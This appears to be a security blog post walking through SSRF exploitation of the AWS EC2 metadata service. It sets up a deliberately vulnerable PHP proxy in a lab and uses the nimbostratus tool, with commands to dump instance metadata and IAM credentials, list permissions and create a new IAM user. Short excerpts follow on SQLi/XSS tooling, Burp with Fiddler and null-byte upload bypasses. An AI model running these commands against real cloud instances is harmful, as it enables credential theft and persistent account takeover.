Skip to main content

Exploiting meta-data on AWS

Introduction:
Metadata server: Every EC2 instance has some user scripts which can be used to pull configuration to launch that EC2 instance. Those configs are stored on a Metadata server (169.254.169.254) 'private' to that Ec2 instance. Each time an Ec2 instance starts , AWS attached the " meta data server" to it, which can be accessed from the instance itself using http://169.254.168.254. The instance meta-data stores information such as :AMIid, Private IP address, Instance Type etc...and...

User-data: OS boot scripts:
AWS allows you to boot up the EC2 using a custom User-data scripts- such as web application, Apache web server, keys. credentials etc. This script, also called user data, is stored by AWS in the instance metadata and retrieved by the OS during boot.

Instance profile:
When EC2 instance wants to access other services such as S3, it uses credentials to access it. Instance profiles give Ec2 instances a way to access AWS services. AWS creates a unique set of credentials for that EC2 instance/ instance profile and makes them available through meta-data stored on the meta-data server.

Exploiting meta-data:
This represents a risk when, because of a vulnerability, an attacker is able to proxy HTTP GET requests through the EC2 instance which allows him to retrieve the user data script from the meta data . In other words,if there is a way for the attacker to ask any of the services running on the instance to perform an HTTP GET request to arbitrary URLs and then return the HTTP response body to the attacker, then he would get access to the repository URL, branch and SSH keys allowing him to access the application source. The most common vulnerability that allows this type of access is a PHP Remote File Include but any other vulnerable software which allows HTTP proxying could be used to retrieve the meta­data too


In this example we'll be using a tool called 'nimbostratus' (http://andresriancho.github.io/nimbostratus/) release in Black Hat by andresriancho.
======
Let's host a web application AWS EC2 instance with the above vulnerability.
======

1. Launch an EC2 instance:

2. ssh to the EC2 machine:


3. Install a web server such as Apache:
4. and php:
5. Once Apache installed, go to the below path:
6. Mention the public IP and port of the EC2, so that it's accessible on internet:
7. Restart the web server by using command: sudo /usr/sbin/apachectrl restart

8. No we'll download a vulnerable php script (greenido’s php proxy script) which allows us to, when exploited as mentioned above, access the meta data from meta data server. Go to the path /var/www/html:

9. Let's access the script in a browser. The greenido’s php script has an ‘url’ parameter which will contain the URL to be connected through the proxy. Perfect!

=====
Let's install the tool 'nimbostratus' as follows:

    git clone git@github.com:andresriancho/nimbostratus.git
    cd nimbostratus
    pip install -r requirements.txt

Now, we are ready with a vulnerable EC2 instance which will act as a target for our demonstration.

Nimbostratus has a python file called mangle.py inside the core -> utils folder which has to be updated with the target URL.
 

=====
Time for action!
./nimbostratus -v dump-ec2-metadata --mangle-function=core.utils.mangle.mangle

  A lot of juicy information extracted:

Here onward we can run the below commands:
To dump IAM credentials:
./nimbostratus -v dump-credentials --mangle-function=core.utils.mangle.mangle

Check the permission associated with the IAM credentials:
./nimbostratus dump-permissions --access-key= --secret-key= --token

We can create new IAM user too depending on the permissions:
 ./nimbostratus -v create-iam-user --access-key=  --secret-key= --token

Rest from here on imagination....!

Reference: http://andresriancho.github.io/nimbostratus/ 

Comments

Popular posts from this blog

Ardilla- New tool for finding SQL Injection and XSS

Three Researchers -- MIT's Adam Kiezun , Stanford's Philip Guo , and Syracuse University's Karthick Jayaraman -- has developed a new tool ' Ardilla ' that automatically finds and exploits SQL injection and cross-site scripting vulnerabilities in Web applications. It creates inputs that pinpoint bugs in Web applications and then generates SQL injection and XSS attacks. But for now Ardilla is for PHP -based Web app only. The researchers say Ardilla found 68 never-before found vulnerabilities in five different PHP applications using the tool -- 23 SQL injection and 45 XSS flaws. More information is awaited. For their attack generation techniques refer to their document at: http://www.cs.washington.edu/homes/mernst/pubs/create-attacks-tr054.pdf

Combining power of Fiddler with Burp

Both are pretty powerful tools when it comes to intercept and modify http communications. But at some point of time, they become even more powerful combo if tied with each other. They complement each other. In a recent pentest I came across a similar situation where in Burp was not able to intercept a specific kind of traffic and Fiddler came to rescue. The application was designed to upload video. The initial communication was straight forward, I mean logging into application, filling up the video details etc. And all these were easily captured by Burp except the point where you hit the Upload Video and it connects to a different server and surprisingly it was not captured by Burp, not sure why, even after repeated attempts. So, I fired Fiddler to see if the it sees this request. But it's a;ways to play with requests using Burp due to it's various functionalities like, Intruder, Repeaters etc. But it was necessary to capture this request in Burp. So the below steps can be

File Upload through Null Byte Injection

Sometimes, during file upload we come across situation wherein there would be check on the file extension at the client side as well as server side too. If the application does allow only .jpeg extension to be uploaded, the client side java script checks for the extension of the file before passing the request. We all know that how easily this can be defeated. Some applications, checks for the extension at the server side also. That's not easy to bypass. However there are some ways with which it still can be bypassed. Most of server side scripts are written in high level languages such as Php, Java etc who still use some C/C++ libraries to read the file name and contents. That leads to the problem. In C/C++ a line ends with /00 or which is called Null Byte. So whenever the interpreter sees a null byte at the end of the a string, it stops reading thinking it has reached at the end of the string. This can be used for the bypass. It works for many servers, specially php servers. T